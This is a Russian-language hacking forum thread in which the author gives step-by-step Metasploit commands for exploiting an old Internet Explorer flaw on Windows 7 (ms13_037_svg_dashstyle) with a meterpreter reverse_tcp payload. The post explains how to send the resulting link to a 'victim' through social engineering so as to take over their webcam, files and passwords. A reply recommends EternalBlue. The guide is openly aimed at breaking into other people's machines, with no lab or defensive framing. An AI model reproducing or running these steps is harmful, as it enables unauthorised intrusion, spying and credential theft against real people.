Загрузка...

Получаем доступ к чужому компьютеру через уязвимость в Windows 7

Тема в разделе Веб уязвимости создана пользователем mrJollier 7 дек 2017. 753 просмотра

  1. mrJollier
    mrJollier Автор темы 7 дек 2017 Всё ещё живой 540 15 фев 2017
    Суть в том, что мы скинем нашей жертва ссылку, которая расшатает уязвимость в Windows 7 и мы получим доступ к веб-камере, файлам и паролям. Единственная проблема в том, что она должна открыть её через Internet Explorer старой версии, которая стоит на семёрке.



    Что нам понадобится:

    1. Kali Linux
    2. Metasploit
    3. Знания СИ (социальной инженерии)


    С Kali Linux и СИ вы уже знакомы и пора бы хоть кратко познакомить вас с Metasploit.



    Metasploit - одна из популярнейших программ, имеющих самую большую базу эксплоитов, шеллкодов и кучу разнообразной документации, что не может не обрадовать.



    Давайте начнём.

    1. Запускаем Metasploit командой "msfconsole".
    2. Выбираем уязвимость браузера. Пишем в командную строку "use exploit/windows/browser/ms13_037_svg_dashstyle".
    3. Далее нужно узнать свой айпи. Пишем в командной строке "ifconfig".
    4. "Set SRVHOST" и через пробел ip жертвы.
    5. Командой "Show Targets" мы можем посмотреть доступные уязвимости.
    6. Выбираем уязвимость IE 8 on Windows 7 SP1, для этого пишем set target 0 (или номер под которым находиться эта строчка).
    7. Выбираем вирус который будет залит жертве. "set PAYLOAD windows/meterpreter/reverse_tcp".
    8. "Set LHOST" и ваш ip, который вы узнали командой ifconfig.
    9. Выполняем команду "exploit".
    10. У вас отобразится ссылка, которую нужно будет отправить жертве. После открытия у неё ничего не отобразится, никакие файлы скачиваться не будут, а вы получите доступ к компьютеру.
     
  2. Alex_merser54
    Alex_merser54 3 янв 2018 Куплю криптор 2 27 ноя 2017
    Eternalblue лучше. Но по WAN сложно взломать
     
Загрузка...
Top